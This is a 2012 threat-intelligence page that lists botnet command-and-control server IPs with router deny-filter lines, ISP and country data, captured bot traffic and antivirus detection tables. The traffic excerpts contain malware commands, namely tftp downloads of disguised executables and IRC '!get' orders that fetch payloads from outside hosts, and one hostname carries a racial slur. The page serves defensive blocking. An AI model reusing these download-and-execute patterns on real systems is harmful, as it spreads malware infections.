Download our list of the most observed botnet command and control server IP addresses.
Most Prolific BotNet Command and Control Servers and Filters
Sun Feb 12 08:41:25 2012
10 Day Filter Set 30 Day Filter Set
| Priority 100 |
TCP Ports 80 |
Filter deny ip host 213.155.14.161 any log ! 225 infects 01/04/12 to 02/11/12 - |
ISP ossadchy - osadchiy yuriy |
| Clients 225 |
 ukraine |
Activity |
Domain - |
Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 95.75.158.158:2384
- Server: GET /index.php?id=vswzrfxuxmxd&scn=4&inf=0&ver=19&cnt=USA...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 26 |
TCP Ports 65520 |
Filter deny ip host 83.133.119.197 any log ! 26 infects 01/06/12 to 02/10/12 greatnet.de |
ISP lncde-greatnet-newmedia |
| Clients 26 |
 germany |
Activity |
Domain greatnet.de |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 110.12.70.106 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 110.12.70.106 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK qhfheepvUSER r020501 . . :-
- Client: JOIN &virtu
- Server: :u. PRIVMSG qhfheepv :!get http:/91.202.244.57/pac.txt:u. PRIVMSG...
- Client: GET /pac.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /temp/PreLoader_59fast.exe HTTP/1.0User-Agent: DownloadHost:...
- Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...
- Server: PONG :j.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | Gen_Heur.FKP.1 |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Gen_Heur.FKP.1 |
| Ikarus | Trojan-Downloader.Cutwail |
| Kaspersky | HEUR_Generic |
| McAfee | MISSED |
| Microsoft | TrojanDownloader_Cutwail.BF |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalEncPk-AAY |
| Sunbelt | MISSED |
| Symantec | Zbot |
| TheHacker | Posible_Worm32 |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 5 |
TCP Ports 65520 |
Filter deny ip host 94.63.149.150 any log ! 5 infects 01/06/12 to 01/09/12 ipv4ilink.net |
ISP evolva telecom s.r.l |
| Clients 5 |
 romania |
Activity |
Domain ipv4ilink.net |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 1.250.41.32 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 1.250.41.32 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK qledpdksUSER c020501 . . :_
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut |
| AntiVir | Virut.A |
| Authentium | Virut.4960 |
| Avast | _Virut-B |
| AVG | Virut.A |
| BitDefender | Virtob.6.Gen |
| CAT-QuickHeal | Virut.A |
| ClamAV | Virut.A |
| DrWeb | Virut |
| eSafe | Virut.a |
| eTrust-Vet | Virut.5127 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.A |
| F-Prot | Virut.4960 |
| F-Secure | Virut.a |
| Ikarus | Virut.a |
| Kaspersky | Virut.a |
| McAfee | Virut.a |
| Microsoft | Virut.A |
| NOD32v2 | Virut.5127 |
| Norman | Virut.A |
| Panda | Virutas.B |
| Prevx1 | MISSED |
| Rising | Virut.a |
| Sophos | Virut-T |
| Sunbelt | MISSED |
| Symantec | Virut.A |
| TheHacker | Virut.gen |
| TrendMicro | PE_VIRUT.A |
| VBA32 | Virut.A |
| VirusBuster | Virut.Gen.4 |
Webwasher
Gateway | Virut.A |
| |
|
| Priority 4 |
TCP Ports 6900 |
Filter deny ip host 190.96.181.218 any log ! 4 infects 01/18/12 to 01/18/12 - |
ISP telebucaramanga s.a. e.s.p |
| Clients 4 |
 colombia |
Activity |
Domain - |
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR agl23.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK USA|32543USER vlskn 0 0 :USA|32543
- Server: :fucken.niggerz NOTICE USA|32543 :*** If you are having problems...
- Server: PONG :F3D4BA8
- Client: JOIN ##TZ getsome
- Client: USERHOST USA|32543
- Client: MODE USA|32543 -x+iJOIN ##TZ getsomeUSERHOST USA|32543MODE...
- Server: PONG :fucken.niggerz
- Server: PONG :fucken.niggerz
- Server: PING :fucken.niggerz:retry!email@fucken.niggerz QUIT :Quit:...
- Server: PONG :fucken.niggerz
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | DropperVB |
| AntiVir | TRJorik.lcbta |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | Generic26.BSSV |
| BitDefender | Gen_Variant.Graftor.12997 |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MulDrop3.27505 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | VBInjector.W!tr |
| F-Prot | MISSED |
| F-Secure | Gen_Variant.Graftor.12997 |
| Ikarus | Jorik |
| Kaspersky | Jorik.Llac.cbt |
| McAfee | MISSED |
| Microsoft | Ircbrute |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | Gen |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 65520
91 |
Filter deny ip host 94.63.147.131 any log ! 1 infects 02/06/12 to 02/06/12 ipv4ilink.net |
ISP evolva telecom s.r.l |
| Clients 1 |
romania |
Activity |
Domain ipv4ilink.net |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 110.14.197.56 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 110.14.197.56 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK xfpqzeilUSER p020501 . . :-
- Client: JOIN &virtu
- Server: :u. PRIVMSG xfpqzeil :!get http:/ghyt54.com/pac33.txt:u. PRIVMSG...
- Client: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
- Server: PONG :k.
- Client: JOIN &virtu
- Server: NICK qpuobuffUSER q020501 . . :-
- Client: JOIN &virtu
- Server: :u. PRIVMSG qpuobuff :!get http:/largokal.net/ex.exe:u. PRIVMSG...
- Server: GET /ex.exe HTTP/1.0User-Agent: DownloadHost: largokal.netPragma:...
- Server: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
- Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...
- Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Welchia.10240 |
| AntiVir | Nachi.A.1 |
| Authentium | MISSED |
| Avast | _Virut |
| AVG | Nachi.A |
| BitDefender | Generic.22648 |
| CAT-QuickHeal | MISSED |
| ClamAV | Virut.ca |
| DrWeb | Virut.5 |
| eSafe | Virut.gen |
| eTrust-Vet | Virut.9276 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.fam |
| F-Prot | Virut.9264 |
| F-Secure | Generic.22648 |
| Ikarus | Virut |
| Kaspersky | Welchia.s |
| McAfee | Nachi.a |
| Microsoft | Virut.AK |
| NOD32v2 | MISSED |
| Norman | Virut.D2 |
| Panda | Virutas.gen |
| Prevx1 | MISSED |
| Rising | Virut.du |
| Sophos | Vetor-A |
| Sunbelt | MISSED |
| Symantec | Virut.B |
| TheHacker | Virut.gen2 |
| TrendMicro | PE_VIRUT.D-4 |
| VBA32 | Virut.3 |
| VirusBuster | Virut.Gen |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 65520 |
Filter deny ip host 91.226.212.159 any log ! 1 infects 02/07/12 to 02/07/12 nacksystem.net |
ISP eu-zz |
| Clients 1 |
 united kingdom |
Activity |
Domain nacksystem.net |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 1.247.138.126 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 1.247.138.126 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK uyhvnrnqUSER f020500 . . :_
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG uyhvnrnq :!get http:/188.247.135.95/555.exe:u...
- Client: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | Gen_Heur.FKP.1 |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Gen_Heur.FKP.1 |
| Ikarus | Trojan-Downloader.Cutwail |
| Kaspersky | HEUR_Generic |
| McAfee | MISSED |
| Microsoft | TrojanDownloader_Cutwail.BF |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalEncPk-AAY |
| Sunbelt | MISSED |
| Symantec | Zbot |
| TheHacker | Posible_Worm32 |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
